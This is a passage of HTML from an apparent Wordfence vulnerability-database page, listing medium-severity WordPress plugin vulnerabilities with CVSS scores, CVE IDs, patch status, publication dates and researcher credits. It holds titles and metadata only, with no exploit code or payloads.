</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d4cc9537-879c-4c12-8b76-60241b7a3420" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b9e4933a-ea03-4dcd-bbb1-b8e571191598" target="_blank" rel="noopener">FileBird – WordPress Media Library Folders &amp; File Manager &lt;= 6.5.6 &#8211; Authenticated (Author+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">5.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15004" target="_blank" rel="noopener noreferrer">							CVE-2026-15004						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/filebird" target="_blank" rel="noopener">FileBird – WordPress Media Library Folders &amp; File Manager</a> <span class="wfvr-software-slug">[filebird]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truonglv1-from-fpt-night-wolf" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d38c2bce8856249cf398ccf5a50ebe63.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d38c2bce8856249cf398ccf5a50ebe63"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truonglv1-from-fpt-night-wolf" target="_blank" rel="noopener">TruongLV1 From FPT Night Wolf</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b9e4933a-ea03-4dcd-bbb1-b8e571191598" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e32f19d9-4af4-45dc-a819-4b40d6eb0f57" target="_blank" rel="noopener">Newsletter &lt;= 9.3.6 &#8211; Unauthenticated Open Redirect</a></h4>
<div class="cvss-score-badge">5.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86823" target="_blank" rel="noopener noreferrer">							CVE-2026-86823						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletter-email-mailing-list" target="_blank" rel="noopener">Newsletter</a> <span class="wfvr-software-slug">[newsletter-email-mailing-list]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e32f19d9-4af4-45dc-a819-4b40d6eb0f57" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7238a6ba-4ef2-4ae1-ba20-7e0a499c98a9" target="_blank" rel="noopener">WP Recipe Maker &lt;= 10.8.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;notes&#8217; Parameter via REST Preview Endpoint</a></h4>
<div class="cvss-score-badge">5.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-90884" target="_blank" rel="noopener noreferrer">							CVE-2026-90884						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-recipe-maker" target="_blank" rel="noopener">WP Recipe Maker</a> <span class="wfvr-software-slug">[wp-recipe-maker]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/saulo-rafael" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6146db281e4e38ef45dd61630c718650.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6146db281e4e38ef45dd61630c718650"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/saulo-rafael" target="_blank" rel="noopener">Saulo Rafael (miquinho)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7238a6ba-4ef2-4ae1-ba20-7e0a499c98a9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ad65e10-6f99-421b-abec-ed374769dfcf" target="_blank" rel="noopener">3D FlipBook &lt;= 1.16.20 &#8211; Unauthenticated Sensitive Information Exposure in &#8216;id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15758" target="_blank" rel="noopener noreferrer">							CVE-2026-15758						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/interactive-3d-flipbook-powered-physics-engine" target="_blank" rel="noopener">3D FlipBook – PDF Embedder, PDF Flipbook Viewer, Flipbook Image Gallery</a> <span class="wfvr-software-slug">[interactive-3d-flipbook-powered-physics-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/cyberdesu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7b84eb12774101c14374003feb2e7d67.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7b84eb12774101c14374003feb2e7d67"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/cyberdesu" target="_blank" rel="noopener">Suredsi Ulpada (cyberdesu)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ad65e10-6f99-421b-abec-ed374769dfcf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/95bc1aa4-f517-4921-99c4-f8fe071eafd9" target="_blank" rel="noopener">Ad Inserter &lt;= 2.8.16 &#8211; Missing Authorization to Unauthenticated Header/Footer Code Disclosure via &#8216;ai-debug-code&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11984" target="_blank" rel="noopener noreferrer">							CVE-2026-11984						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ad-inserter" target="_blank" rel="noopener">Ad Inserter – Ad Manager &amp; AdSense Ads</a> <span class="wfvr-software-slug">[ad-inserter]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/xiang-li-liu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1ffbed81dd7ad7b6f1301707d20b20a8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1ffbed81dd7ad7b6f1301707d20b20a8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/xiang-li-liu" target="_blank" rel="noopener">Evan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/95bc1aa4-f517-4921-99c4-f8fe071eafd9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5a8737b1-fb68-4609-8474-9395f30c1089" target="_blank" rel="noopener">All-in-One WP Migration and Backup &lt;= 7.110 &#8211; Unauthenticated Insufficient Credential Protection via Authorization Basic Header</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89064" target="_blank" rel="noopener noreferrer">							CVE-2026-89064						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-in-one-wp-migration" target="_blank" rel="noopener">All-in-One WP Migration and Backup</a> <span class="wfvr-software-slug">[all-in-one-wp-migration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e66631a82bedaeec90118eb6ae46faab.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e66631a82bedaeec90118eb6ae46faab"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman-2" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5a8737b1-fb68-4609-8474-9395f30c1089" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b6d9539f-1f75-49ca-b7b8-a400e948d6b5" target="_blank" rel="noopener">Appointment Hour Booking &lt;= 1.5.94 &#8211;  Unauthenticated Appointment Slot Capacity Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86475" target="_blank" rel="noopener noreferrer">							CVE-2026-86475						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/appointment-hour-booking" target="_blank" rel="noopener">Appointment Hour Booking – Booking Calendar</a> <span class="wfvr-software-slug">[appointment-hour-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nicat-sultanov" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bded93ac30db05695b969d802a1b2096.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bded93ac30db05695b969d802a1b2096"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nicat-sultanov" target="_blank" rel="noopener">Nicat Sultanov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b6d9539f-1f75-49ca-b7b8-a400e948d6b5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee6a7c36-3936-43ee-971d-0bc467eda90c" target="_blank" rel="noopener">Autopay &lt;= 5.0.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-90923" target="_blank" rel="noopener noreferrer">							CVE-2026-90923						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/platnosci-online-blue-media" target="_blank" rel="noopener">Autopay</a> <span class="wfvr-software-slug">[platnosci-online-blue-media]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee6a7c36-3936-43ee-971d-0bc467eda90c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fff2d1c9-dfc2-4ba3-8171-1952bd2684a3" target="_blank" rel="noopener">BerqWP – All-In-One Optimization for Core Web Vitals, Cache, CDN, Images, CSS &amp; JavaScript &lt;= 4.1.15 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78528" target="_blank" rel="noopener noreferrer">							CVE-2026-78528						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro" target="_blank" rel="noopener">BerqWP – All-In-One Optimization for Core Web Vitals, Cache, CDN, Images, CSS &amp; JavaScript</a> <span class="wfvr-software-slug">[searchpro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/z3r0s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/76b37473036c0cad989fac58fdce9e75.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="76b37473036c0cad989fac58fdce9e75"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/z3r0s" target="_blank" rel="noopener">z3r0s</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fff2d1c9-dfc2-4ba3-8171-1952bd2684a3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df28ecd7-d463-48b7-95e6-8adc9f34d6bd" target="_blank" rel="noopener">Better Messages &lt;= 2.15.33 &#8211; Unauthenticated Information Exposure Spoofing via &#8216;X-Real-IP&#8217; Header via /guests/register</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89093" target="_blank" rel="noopener noreferrer">							CVE-2026-89093						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bp-better-messages" target="_blank" rel="noopener">Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots</a> <span class="wfvr-software-slug">[bp-better-messages]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/64cf1475dedd021651902db53af18364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64cf1475dedd021651902db53af18364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener">Jonah Burgess (CryptoCat)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df28ecd7-d463-48b7-95e6-8adc9f34d6bd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/199a4e3d-fad6-4923-b804-fcb1c6980381" target="_blank" rel="noopener">Booking Calendar &lt;= 11.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74002" target="_blank" rel="noopener noreferrer">							CVE-2026-74002						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking" target="_blank" rel="noopener">Booking Calendar</a> <span class="wfvr-software-slug">[booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/199a4e3d-fad6-4923-b804-fcb1c6980381" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9e0c6f83-f4ca-4891-b2db-e2ac49d96ee5" target="_blank" rel="noopener">Booking for Appointments and Events Calendar &#8211; Amelia &lt;= 2.4.5 &#8211; Missing Authorization to Unauthenticated Payment Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16582" target="_blank" rel="noopener noreferrer">							CVE-2026-16582						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia</a> <span class="wfvr-software-slug">[ameliabooking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ricky-morty" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/254001b8e88f4f8e7835efdbc417a206.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="254001b8e88f4f8e7835efdbc417a206"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ricky-morty" target="_blank" rel="noopener">ricky morty</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9e0c6f83-f4ca-4891-b2db-e2ac49d96ee5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9220d87a-6016-4d24-9d47-81db5a6609a0" target="_blank" rel="noopener">Bookly &lt;= 28.1 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-91847" target="_blank" rel="noopener noreferrer">							CVE-2026-91847						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookly-responsive-appointment-booking-tool" target="_blank" rel="noopener">Online Scheduling and Appointment Booking System – Bookly</a> <span class="wfvr-software-slug">[bookly-responsive-appointment-booking-tool]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuxvinh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cf5907d5170a7200adc6f07076350d97.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cf5907d5170a7200adc6f07076350d97"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuxvinh" target="_blank" rel="noopener">vuxvinh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9220d87a-6016-4d24-9d47-81db5a6609a0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee2d7d01-da87-43b4-8d2b-2c9eef3c80e6" target="_blank" rel="noopener">Botiga Pro &lt;= 1.6.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86591" target="_blank" rel="noopener noreferrer">							CVE-2026-86591						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/botiga-pro" target="_blank" rel="noopener">Botiga Pro</a> <span class="wfvr-software-slug">[botiga-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
